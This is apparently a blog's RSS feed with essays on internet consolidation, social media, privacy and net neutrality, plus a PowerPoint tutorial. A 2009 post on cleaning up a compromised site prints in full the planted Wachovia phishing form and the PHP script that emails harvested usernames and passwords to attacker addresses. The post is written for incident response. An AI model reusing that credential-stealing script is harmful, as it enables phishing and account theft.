Chronosynclastic Infundibulum » internet http://www.semanticoverload.com The world through my prisms Thu, 07 Apr 2011 17:36:17 +0000 en-US hourly 1 http://wordpress.org/?v=3.5 Corporate Consolidation in Web 2.0 http://www.semanticoverload.com/2010/08/21/corporate-consolidation/ http://www.semanticoverload.com/2010/08/21/corporate-consolidation/#comments Sun, 22 Aug 2010 00:33:28 +0000 Semantic Overload http://www.semanticoverload.com/?p=688 In the 1960s, USA was host to a huge array of small business and stores. They have all but disappeared. The consolidation of corporations into the gaints that we see now have either gobbled up the mom-and-pop stores or driven them out of business. This started with the deregulation under Regan in the 80s. Next came the deregulation of media in the 90s which saw
many local TV and radio stations disappear to be replaced by commercial radio stations across the American landscape. I have a strong suspicion that the Internet is next.

source: blindfiveyearold.com

To clarify what I am talking about, take a look at the recent (and by recent I mean in the last 5 years or so) spate of acquisitions by all the big players in the Internet business (both hardware and software): Intel acquired McAfee, Google acquired Like.com (and before that YouTube, Blogger, Writely, and many more), Oracle acquired AmberPoint and Secerno, Yahoo recently acquired Korpol and citizensports.com, Microsoft acquired Sentillion and Opalis among so many more, Apple recently accquired Quattro, Lala media, Intrinsity, and Siri, and Cisco has made over 48 acquisitions in the last decade following by IBM with 35 [source].

This is just the tip of the iceberg, and if this is any indicator of things to come, then you can expect such large scale consolidation to leave the Internet services and infrastructure is very few large players. This coupled with the betrayal of Google against net neutrality makes for an ominous prediction.

Increasingly, it looks like the best hope of an Internet startup is to be acquired by one of these gaints because otherwise they risk being drowned by an ‘addon’ service offered by these gaints (sometimes for free). A great example is Facebook places and Google places vs. Gowalla, Foursquare, and their kind. So all your mom-and-pop store equivalent of Web 2.0 are now being consolidated into Google, Yahoo, Facebook, Intel, Oracle, Cisco, and few others.

So why is this bad? To get an idea of where that is going to leave us, take a look at what happened with the deregulation of the radio and TV stations in the US. You can’t get decent local news  and happenings anywhere except a few major cities. Rest of the places, local coverage is spotty. All local music now have to go to the major recording and music capitals of the nation just to be heard on the radio in their own home town. As a member of a local community radio station, I know how difficult things have become for independent radio broadcasters.

Expect something similar for the web. Expect to lose the rich and diverse sources of information and entertainment you are used to receiving from the web. It may not happen this year, or even in the next 5 years. But in the next decade, the web is going to be far less free than you see it today. The corporations want it that way, and that is how it will stay because the politicians won’t vote otherwise.

Welcome to Web 3.0 :-)

]]>
http://www.semanticoverload.com/2010/08/21/corporate-consolidation/feed/ 1
On the maturation of social media http://www.semanticoverload.com/2010/08/10/social-media-maturation/ http://www.semanticoverload.com/2010/08/10/social-media-maturation/#comments Wed, 11 Aug 2010 00:51:16 +0000 Semantic Overload http://www.semanticoverload.com/?p=659 In this recent article, Newsweek claims that traditional social media like blogs and upcoming ones like twitter are on the decline because we as a people are simply too lazy and wouldn’t do something for free [hat tip: Patrix]. Newsweek has really embarrassed itself with this post. Let me explain how.

First, let us examine the evidence that Newsweek provides for the decline in social media.

  1. Wikimedia, after its prolific crowdsourced contribution to wikipedia until 2009 is now having to recruit contributors and editors.
  2. According to Technorati, professional bloggers are on the rise whereas hobbyist loggers (like your truly) are on the decline. 95% of the blogs are abandoned in the first month. A recent Pew study found that blogging has withered as a pastime, with the number of 18- to 24-year-olds who identify themselves as bloggers declining by half between 2006 and 2009.
  3. Although twitter is adding users at an astounding rate, 90% of tweets come from 10 percent of users, according to a 2009 Harvard study. Between 60 and 70 percent of people signing up for twitter quit within a month, according to a recent Nielsen report.
  4. While Digg won readers, it struggled to sign up voters and has forced a change in format to something similar to social networking sites like facebook.

Based on this evidence, the article concludes that (a) traditional social media and citizen journalism is on the decline (the only kind of social media that is rising is the one that allows people to connect with each other), and (b) the underlying reason for it is that people are lazy to do anything for free. Do you seen the disconnect in logic and reasoning here?

Novelty Factor

First, the author of the article chooses to completely ignore the ‘novelty’ factor that we are all subject to. Remember Beanie babies? How about the slinky? They were wildly popular when they first came out, but not any more. Is that because people got too lazy to play with them? Of course not! It’s the novelty factor. When people see something new, it will pique their interest and exploring it is a reward unto itself. So people tend to use it to understand it. Once the novelty factor wears out, only the hardcore fans and professionals occupy the niche. It explains everything from the slinky and beanie babies to blogs and twitter. I am surprised that the article did not make that connection.

Knowledge Generation and Gatekeepers

Second, how is wikimedia’s recruiting professionals a bad thing, even for social media? Knowledge validity is not subject to democracy. Evolution does not become untrue simply because a majority of our population choose to be Bible thumpers. If wikimedia intends to be taken seriously as a repository of human knowledge, it needs gatekeepers and knowledge generation agents who are proficient in their respective areas and disciplines. This ensures that crowdsourced information and knowledge is validated before it pollutes the repository.

Blogging Bubble

Third, the article seems to assume that everyone who started a blog started it with the intention of generating information to be shared with everyone. This is simply not true (see my earlier point about the novelty factor). In fact, I will hazard to assert that a vast majority of the people who blog do not do it to generate more information for the benefit of others. I will go on to claim that it is blogs like these that tend to be abandoned. Therefore, no harm no foul there. Its not too different from an economic bubble really. Much like the housing bubble gave people and unrealistic estimate of the value of real estate, the ‘blogging  bubble’ (the phenomenon of everyone on the street having a blog of their own) gave people an inflated idea of the amount of information being generated by the blogsphere. When the blogging bubble is now burst, and the `decline’ or `stagnation’ we see now is the intrinsic value of the information generated by the blogsphere all along.

Not everyone wants to generate, aggregate, and share information. That is perfectly fine. If you have everyone generating information, who is there to consume, process, and utilize them?

Social Cliques

Fourth, when it comes to platforms like Digg, they started with the premise that if a lot of people “dig” something, then the odds are that a lot more people will be interested in the information that has been “dug”. As it turns out, the premise is not entirely accurate. People are members of relative small cliques, and the value of the same piece of information varies  from one clique to another. Digg recognized this and has taken steps to reorganize the site to align with this empirical observation. That does not mean that social media is on a decline. It simply means that we are using social media differently.

Motivation for Congnitive Tasks

The article also talks about putting rewards in place to encourage participation in sites like Gawker and Huffington Post and then makes a snide remark about the next step being offering money. Obviously Newsweek is ignorant to Dan Pink’s presentation on what motivates people. The bottom line is that money is not a motivator for cognitive tasks. (in fact, it could be a de-motivator) Most of traditional social media is about performing cognitive tasks to generate and collate information.

As a counter example, consider Linux, an open-source operating system. It has thousands of contributors who work for free to create a product and then give that product away for free! It’s not too different from many bloggers who blog for free and allow viewing the blog for free. It’s not too different from wikimedia contributors adding and editing articles. Linux and the open-source movement is as strong as ever. So why should blogs and wikimedia be any different?

Then what about the data and statistics that the article presented? Well, that simply says that a whole bunch of people jumped on the bandwagon for all the wrong reasons and now they getting off the bandwagon. But there are still a sufficient number of individuals left to carry on the movement.

So yeah, the blogsphere is maturing, wikimedia is maturing, not dying. All that means is that now on, the only people who are going to get on to traditional social media are the ones who see an intrinsic value in the participation, and I am pretty confident that there will be plenty of people. Think Linux, think open source. This is no different.

]]>
http://www.semanticoverload.com/2010/08/10/social-media-maturation/feed/ 0
My interview on Information Underground with Teddy Wilson on KEOS 89.1FM http://www.semanticoverload.com/2010/08/08/my-interview-on-information-underground/ http://www.semanticoverload.com/2010/08/08/my-interview-on-information-underground/#comments Mon, 09 Aug 2010 04:12:32 +0000 Semantic Overload http://www.semanticoverload.com/?p=645 I was on the radio show Information Underground with Teddy Wilson on KEOS 89.1FM Bryan/College Station. We discussed blogging, bloggers, the blogsphere, their influence on mainstream media, and the future of blogging.
Here is the entire radio show sourced from Blogtalkradio:
Listen to internet radio with Teddy on KEOS on Blog Talk Radio
]]>
http://www.semanticoverload.com/2010/08/08/my-interview-on-information-underground/feed/ 1
Social Media: on why Obama won and Palin won’t http://www.semanticoverload.com/2010/08/07/social-media-obama-vs-palin/ http://www.semanticoverload.com/2010/08/07/social-media-obama-vs-palin/#comments Sun, 08 Aug 2010 00:24:29 +0000 Semantic Overload http://www.semanticoverload.com/?p=621 Obama’s unprecedented use of social media as a critical marketing and canvasing tool to enable his historic victory in the 2008 presidential race has been dissected and beaten to death. I am not here to resurrect that zombie. However, I will take a singular incident of his campaign to illustrate my point (that is, why Obama won and Palin won’t.)

The incident I am talking about was cited by Clay Shirky in this TED video on “How social media can make history.” The incident is as follows: Obama’s campaign started a portal http://my.barackobama.com for all of Obama’s supports to gather and discuss issues related to the campaign, organization, marketing, and Obama’s platform itself. Now, in January 2008 Obama had announced that he was against the FISA amendment that allowed warrentless wiretapping, but in mid-summer 2008, he reversed his opinion and said that he would support that FISA amendment. Expectedly, there was a huge outcry against his reversal among his supporters and they thronged to the discussion forum in http://my.barackobama.com, voiced their concerns, and asked Obama to not support the FISA amendment. The outcry was so loud that Obama had to release a statement that essentially said that he has heard his supporters loud and clear; his position is based on his assessment of the amendment; the reasons for which he supports it still stands; so he will continue to support the bill and take the hit from his supporters on this one.

Naturally, his supporters weren’t happy. But later on, there was realization among his supporters that although Obama didn’t agree with them, he never tried to shut them up. There was no censoring of dissenting opinions. There was no banning of people who didn’t like his position or platform. This mature treatment of social media as an extension of democracy and free speech ensured that he did not lose his support base.

Now, fast forward to present day. No political public figure is more prolific on social media than Sarah Palin. She has over 2 million supporters on her facebook page. Strangely, the comments on her facebook page is, for the most part, lavish outpouring of admiration, encouragement, support, and agreement. There are very few dissenting opinions, if any at all. All this seemed fishy to John Dickerson from The Slate, so he and his colleague Jeremy Singer-Vine decided to find out what was really going on. Singer-Vine wrote a program to track deletions of comments on Sarah Palin’s facebook page and found that the “wall” on Sarah Palin’s page was being sanitized through heavy censorship to the point of frustration among her supporters. Naturally the comments expression such frustrations were deleted as well. For example: “Why are the few comments expressing disagreement with this endorsement being deleted?” wrote one. ” Just because some of us disagree with the endorsement doesn’t mean that we don’t follow Sarah Palin.” That was deleted too.

Such censorship is almost guaranteed to backfire on Palin. As a public figure running for office, the way one treats their supports is strongly indicative of how they will treat their constituents, and everyone, including supporters, realize this. This why is why Obama’s supporters didn’t abandon him over the FISA vote, and there is a very good chance that Palin’s supporters will desert her.

]]>
http://www.semanticoverload.com/2010/08/07/social-media-obama-vs-palin/feed/ 2
If a tree falls in the forest… http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/ http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/#comments Thu, 05 Aug 2010 04:42:25 +0000 Semantic Overload http://www.semanticoverload.com/?p=570 “If a tree falls in the forest and there is no one to hear it, does it still make a sound?” This, in essence, is the issue of privacy. If a specific action (or information) is unobservable (even after the fact) by no one else but the actor, then that act (or information) is, by definition, private. The actor could potentially by a single individual or a cohort. Now, because we are in the so-called “information age”, increasingly greater portions of our actions and our information are becoming observable. Unfortunately, very few of us realize this, and so many actions that we thought were private, are not so, and this getting a lot of people into hot water. Naturally, there is a backlash, and resulting turbulence is now presenting itself in all its glory all over the Internet.

Even though there is a lot of noise about privacy issues, there isn’t really anyone with a clear picture on where things are, where they will be heading, where they should be heading, and how do we as individuals adapt to these changes. I think the problem is that of methodology. People are trying to solve new-age problems with old-age tools; it’s not going to work. In this post, I attempt to explain my foregoing sentences.

Fatalists and conservatives. Let us take a look at the two major camps on the issue of privacy today. On one side you have the likes of Mark Zukerberg, David Thomson, and Samy Kamkar who believe that privacy is dead (the fatalists), and on the other side you have the likes of Future of Privacy Forum and Bruce Schneier who believe that maintaining our privacy is only a matter of setting up the right legal/economic framework of incentives and disincentives within the present (and future) context (the conservatives).

Both camps have valid points. Despite all the brouhaha about privacy issues with facebook, facebook continues to add more users, and current users continue to treat facebook as their repository of their social life and social interactions. So maybe privacy really is dead! But the very fact that there is such a backlash reveals the fissure in society where you have a significant faction that jealously guards many of its actions and its information, but finds that it is not able to maintain its privacy because ‘other entities’ (friends, banks, credit card companies, and such) are making them public. And there are still others who simply do not realize that what they think is private really is not. So the question is, what is the state of the art on this issue?

Privacy vs. Security. The first problem that you encounter when trying to answer that question is that there no common understanding of what privacy really is. Often people bleed their concerns of security into the issue of privacy. This is muddying the waters to the point where no coherent narrative emerges. While security is and should always be a grave concern, it an orthogonal issue to privacy. One possible consequence of loss of privacy is that the security of our property and resources is at jeopardy, but that is not a basis to conflate privacy with security. There should be separate discussions on each issue. They may complement each other but one should not supplement the other. Remember, a secure life does not guarantee a private life!

Privacy through public obscurity. Now that we know we talking exclusively about privacy and not security, we can move forward. In the past privacy has been protected largely due to the technological limitations that made several tasks intractable. Such intractability lead to privacy through public obscurity. For example, before the advent of telegraph and telephone, there was very little to worry about legitimate information about your activities (that you deem private) to your relatives in a different state. Why? Because of what I like to call Chinese-Whispers effect. But that changes with the ubiquity of telephones. Similarly, before the advent of the internet, at any point in your life, you were free to ‘reinvent’ yourself by simply moving to a new town, getting a new job and simply not citing individuals from your old life as references. There was very little anyone could reasonably do to dig up your past life (of course, you could always hire a private-eye, but that would constitute an unreasonable effort).

In fact, the privacy of your online communications with your bank are established by privacy through public obscurity. Worried? Don’t be, not for now at least. All `secure’ online communications use what is called public-key cryptography which involves dealing with numbers that have 100-200 digit prime numbers as their factors and encrypting messages with these numbers. In order to decrypt the message, one has to be able to factorize the large number into its constituent large prime numbers. The fastest-to-date mechanism to factorize a number is still by brute-force, and hence intractable. For even the fastest computers, this task could take years, by which time the contents of your private communication will be (hopefully) irrelevant. Thus, privacy through public obscurity.

I bring up the example of public-key encryption for a reason: the task of factorizing large numbers, although intractable right now, might not be so in the future (it wont be because the computer got faster, it will be because either quantum computers become a reality, or the answer to the famous P=NP problem in computer science is the affirmative). If that happens, then what do you think society’s response will be? Do you do expect two camps: one that says cryptography is dead, and another one that says all mechanisms to factorize numbers should be outlawed or disincentivised some how? Of course not. That’s an absurd proposition! The response will be to build a better cryptographic technique that works despite the state of the art.

We are facing a similar situation with privacy today, and the two camps that I referred to earlier are not helping. The fact remains that these days more often than not someone is hearing a tree fall in the forest, and so more trees are making a sound when they fall. So how do we deal with it?

First, learn to give up some of your privacy. Technology has made a lot of tasks tractable, and our physical and mental abilities and faculties are not evolving at a rate to match the pace of technology. Consequently, we are not able to make all our actions intractable to the new technology. So we have to give up some of our privacy. While this may be a ghastly notion for people in the western hemisphere, it is surprisingly common for societies in the eastern hemisphere to trade privacy for social support structure, security, and (more controversially) for happiness. Much like we have given up privacy for air flights but not for bus or train journeys, we may have to give up privacy in certain aspects of your life that we had otherwise considered to be private.

As for the natural follow-up question, what aspect of our privacy do we have to give up, I honestly don’t know. My speculations and proposals here are of methodological nature. I am not answering questions. I am just trying to figure out what the right questions to ask are! Isn’t that the first step in arriving at a resolution to our privacy issues?

Second, indulge in information overload. The less information you give out, the more useful every extra bit of information about you is. Inevitably, despite your best efforts, more information about you will leak out. So how do you counter that? With information overload. Take Hasan Elahi as a classic example. After he was erroneously put on the FBI terrorist watch list, and he had to endure a gruelling questioning by the FBI that took up hours of his time and ultimately to no one’s benefit, he decide to turn the tables on FBI. He put up a website called Tracking Transience where he has up up pictures, videos, and all sorts of evidence of where he has been and what he has been doing every hour of every day! Since there is already so much information about him available, any additional information about him is not so useful any more. Curiously, he doesn’t appear in any of this photographs. He is one behind the camera. So in a sense although he has given you so much information about him, he really hasn’t given you anything that is remarkably useful. Paradoxically, by revealing so much about himself online, he has secured his privacy. [For details, visit: http://memes.org/tracking-transience-hasan-elahi]

Ok, so Tracking Transience works for Hasan, what about the rest of us? Again, I am only showing you where to being asking the right questions; I do not have answers for you.

Are there any more tools of this or different kind that we can employ? Arguably, yes. One needs to look harder, and looks at different places. The new tools are different in kind, and presumably, in an ironic twist, an artefact the technology that has precipitated the issue of privacy in the first place.

In conclusion, my argument simply is that you cannot use old tools of fatalism, legal recourse, and economic regulation to frame the debate of privacy and expect a resolution. They are simply the wrong tools for the job! I will wrap this post up by continuing with the metaphor with which I started this article: if the tree falls in the forest and there are people to hear it, then let them hear it, but make sure that every minute sound made by the tree and the trees around it are perpetually amplified and broadcast to where the sound made by the falling tree become noise and simply irrelevant!

]]>
http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/feed/ 0
If your site has been compromised with phishing attack code… http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/ http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/#comments Tue, 17 Mar 2009 07:30:42 +0000 Semantic Overload http://www.semanticoverload.com/?p=316 I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ‘screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ‘screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ’000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

]]>
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/feed/ 7
Rajani ka Ishtyle http://www.semanticoverload.com/2008/09/03/rajani-ka-ishtyle/ http://www.semanticoverload.com/2008/09/03/rajani-ka-ishtyle/#comments Wed, 03 Sep 2008 06:17:46 +0000 Semantic Overload http://www.semanticoverload.com/?p=185 Rajani in Castrol Power 1 Commercial

]]>
http://www.semanticoverload.com/2008/09/03/rajani-ka-ishtyle/feed/ 0
Net Neutrality: what is it really about? http://www.semanticoverload.com/2008/04/25/net-neutrality/ http://www.semanticoverload.com/2008/04/25/net-neutrality/#comments Fri, 25 Apr 2008 22:01:41 +0000 Semantic Overload http://www.semanticoverload.com/?p=158 Net Neutrality has been an ongoing debate for quite a few years now. In its simplest terms, net neutrality is a principle that states that all traffic on the internet must be treated the same way; that there should be no preferential treatment to a specific kind or class of traffic. The are many camps for and against net neutrality. Each group fervently advocates its position on the issue, while slinging mud on the other camp. This debate has polarized large sections of stakeholders on the internet. Unfortunately, most of the polarization is based more on propaganda and prejudice than facts. Investigating the net neutrality issue reveals that the waters are indeed quite muddy.

The groups supporting net neutrality — like SaveTheInternet.com Coalition — argue that net neutrality is fundamental to the success of the internet. Net Neutrality prevents ISPs from speeding up or slowing down Web content based on its source, ownership or destination. If ISPs are allowed to slow certain web content down and speed others up, based of Service Level Agreements (SLA) with content providers (like Reuters, Fox News, Yahoo, Google, Facebook etc.), then this will result in all big corporations signing SLAs with all ISPs, and individual content providers like bloggers will be left out in the cold, and there is little that can be done against such discrimination. In essence, the advocates argue that net neutrality an extension of free speech, and is necessary to protect free speech on the internet. Other implications of not having net neutrality include ISPs allowing (say) Google’s pages to load faster than (say) Yahoo’s (because Google signed an SLA with the ISP), thus denying its users efficient access to their trusted source of information.

The groups opposing net neutrality — like Hands Off The Internet Coalition — argue that heavy regulation of the internet runs against free market economics, and that such restrictions slow down the rate of innovation on the internet. They argue that different kinds of internet traffic have different requirements. For instance, live chat requires less bandwidth, but the traffic cannot be delayed, on the other hand streaming video requires high bandwidth, but can afford some delay because the video is buffered at the viewing computer, downloads can withstand occasional delays and low bandwidth. It makes sense treat each of these traffic streams differently in order to provide a better user experience, but net neutrality prohibits this.

Lets see how the arguments for and against net neutrality really stand up to criticism.

Now, if net neutrality was implemented as a strict regulation, this can give rise to a lot problems. For instance, how do network providers treat spam under net neutrality? Currently, network providers can block spam at the entry point into their network. If the networks are expected to treat all traffic equally, then they have to treat spam the same as other traffic. Which implies that they are having to bear the cost of routing spam on their networks with no income from it. Guess who they will pass that cost on to: the consumers. So is net neutrality really what the consumers want?

If customers subscribed to a pay-per-view service over the internet, then customers have every right to be guaranteed a satisfactory viewing experience. However, the network provider cannot do that under net neutrality because the provider is not allowed to allocate bandwidth for the pay-per-view service. So is net neutrality really helping?

On the other hand, if net neutrality wasn’t implemented then this would allow network providers to treat different kinds of traffic differently, thus providing a better user experience. But if that were truly an issue then how do different classes of network traffic work well today without so-called ‘tiered’ services for different classes of traffic. Answer: there is more bandwidth in the network core than the traffic consumes. As long as there is good admission control on the edge of the Internet, it doesn’t seem like you need such ‘tiered’ services. Wouldn’t that make the ‘tiered’ services argument too weak?

Consider the competition between VoIP services and traditional phone lines. Typically all your phone providers are also ISPs. And VoIP is very sensitive to delay in the traffic, more so than web browsing, streaming video, or downloads. So if the ISPs wanted to discourage their customer from using VoIP services, then they could do that by simply delaying packets for a few seconds randomly. For web browsing and other services, it would only show up as a few seconds delay in a page loading, or a delay in the video starting, which is easily tolerable. But with VoIP, this would show up as a jitter in a voice call. This would make VoIP unusable. Don’t we need regulations to protect the customers from such practices? Isn’t net neutrality a way out of this?

So net neutrality, while addressing some issues, opens up other problems which the Internet community will have to deal with. Worse, while it is easy to make a regulation like net neutrality, it is very difficult to enforce it. How do you detect a violation of net neutrality? If ‘bad’ ISPs are smart enough, then they can hoodwink any mechanism to detect such violations. It can range from delaying all traffic for a few seconds so that only VoIP services are affected, to dropping only certain kinds of traffic during periods of traffic congestion. The above two techniques is indistinguishable from situations where a `good’ ISP is having traffic management problems and so is forced to delay traffic, or is forced to drop traffic during congestion. So how do you distinguish ‘bad’ ISPs from ‘good’ one and penalize only the ‘bad’ ones? Its not always possible.

So, if net neutrality is more a regulation in theory, than something which can be enforced successfully, and people do realize it, then why do we have groups advocating for it so strongly? What could be gained from it, other than a rhetorical stand on the ideals that they strive for? The answer might surprise you.

Ironically, the arguments being made on both sides of net neutrality fails to address the real issue. In fact, it serves to hide the real issue of why net neutrality has become such a focal point of conflict on the internet today. To understand this better, lets see who are the corporate entities involved in the net neutrality debate. The supporters of net neutrality include the likes of Google, Yahoo, eBay and AeA. The opposers of net neutrality include the likes of 3M, Cisco Systems, Qualcomm, Verizon, AT&T, and Time Warner. Note that there is a clear division of the functional roles of each camp. The camp which supports net neutrality are all content providers where as the camp which opposes net neutrality are all network infrastructure providers.

Why do content providers like net neutrality? Because it allows the content providers to innovate and come up with new applications and solutions without having to worry about how these application will be treated by the network. Why do network infrastructure providers oppose net neutrality? Because this will aloow for innovation and diversity in network infrastructure to accommodate new applications and solution which can evolve from the Internet. What does this mean? This means that net neutrality is no longer about free speech, or democracy, or free market, or any ideals. Its all about who gets to control the internet and the innovation in it. Net neutrality, under the hood, is an ongoing battle between content providers and infrastructure providers over who controls the web and the innovation in it.

]]>
http://www.semanticoverload.com/2008/04/25/net-neutrality/feed/ 0
Making Your Presentations Portable http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/ http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/#comments Mon, 21 Apr 2008 22:32:18 +0000 Semantic Overload http://www.semanticoverload.com/?p=150 I had the following problem(s):

  • I had a fairly large presentation which I had to share among several people for review.
  • Not everyone was running the same version of Powerpoint, and not everyone used Windows.
  • People who wouldn’t be able to make it to my actual presentation wanted to be able to view it (along with the voice narration) later.
  • I wanted it to be accessible and usable by everyone regardless of the OS, the browser, or the presentation software they were using.

I figured this was a pretty common problem that many people face and a documented solution would be nice. More so, since someone I demonstrated this solution to now swears by it and can’t thank me enough. So I figured, why not spread the knowledge :) (Unfortunately, this solution works only if you are using Windows XP/Vista. Sorry, I couldn’t find the right tools to make it work on MAC OS X.)

Here’s the bird’s eye view of my solution:

  1. Prep your presentation to be made ‘complete’ and ‘kiosk-ready’.
  2. Download and install AuthorPoint Lite.
  3. Import the presentation into AuthorPoint Lite, and preserve the rehearse timings, animations, and (optionally) narration.
  4. Convert the presentation to flash using AuthorPoint Lite.
  5. Upload the generated swf file online for the world to see!
  6. The End.

Prepping your presentation

Before you can make a presentation portable, you have got to make sure that the presentation itself has enough information in it to be portable. Also, you have to ensure that the presentation have been configured so that the tools you will use to make it portable can use it to advantage.

So here’s how you would go about the job:

Ensure all information is available

When are making a presentation portable, then, more often than not, the people who will access it will not have the luxury of you walking through the presentation for them. So make sure you have notes for each slide for the presentation to be understandable on its own, even without the speaker present. It often a good idea to include the text of your narration for each slide in the Slide Notes section.

Recording Narration

You also have the choice of recording your narration. You can do this if you would like people to be able to view and hear your presentation online. In order to record your presentation (Assuming you have a workgin microphone to record) you need to do the following:

  • Ensure that you have no automatic animations set. You can do that as follows:
    1. Click on the Slide Show menu and choose Custom Animation.
    2. Click on the first item in the Animation Order box on the Order & Timing tab.
    3. Select the On Mouse Click radio button under Start Animation as shown in the figure below.Unset Custom Animation
  • Test your microphone by opening Slide Show -> Record Narration -> Set Microphone Level button. You’ll see the Microphone Check dialog box pop up. Set the level appropriately as shown below:Testing Microphone
  • You can adjust the sound quality if you like:
    Adjust Sound Quality
  • DO NOT check the ‘Link the Narrations’ checkbox! This option being unchecked is very important for portability!
  • Now start recording you narration and manually click through the slides (and animation) as you narrate into the microphone. You can stop anytime by pressing [Esc]. After you reach the last slide, or after you press [Esc], PowerPoint will ask if you’d like to save the slide timings. Click No. (As shown below):
    Save Slide Timings Dialog
  • Now you can browse through the slides and review your narration by clicking on the sound icon icon. You can delete the narration on each slide and record the narration if necessary.

Rehearsing Timing

Click on the Slide Show menu and choose Rehearse Timings. You’ll immediately be transferred into Slideshow View, and the narration should begin. You’ll see a Rehearsal toolbar appear:

rehearse timing

Advance through the presentation by advancing to the next slide when the narration for each slide is complete. Also make sure that you step through the animation appropriately. When you’ve scrolled through the entire presentation, PowerPoint will again ask if you’d like to save the timings. Click Yes.

Now your presentation is self-contained and complete. However, it is still a .ppt file. To make it portable, you need to convert it to a more portable format. My choice is ShockWave File, or Flash format.

AuthorPoint Lite

AuthorPoint Lite is a free Powerpoint-to-Flash converter. The neat thing about this software is that it can import all the settings from a powerpoint slide including narration, rehearsed timing, custom animation etc. Here is a great review on AuthorPoint Lite.

  • Download and install AuthorPoint Lite
  • Import your presentation into AuthorPoint Lite.
  • Save it as a swf file.

Uploading the swf file

Now upload the saved swf file to your webserver, and provide a link to it on your website. This swf file is your presentation complete with your narration, animation, slide timings, your slide notes, etc. And the best part is that sinceits a swf file, any browser with a flash plugin can play this file! Truly portable!

Enjoy

The End

:)

]]>
http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/feed/ 5
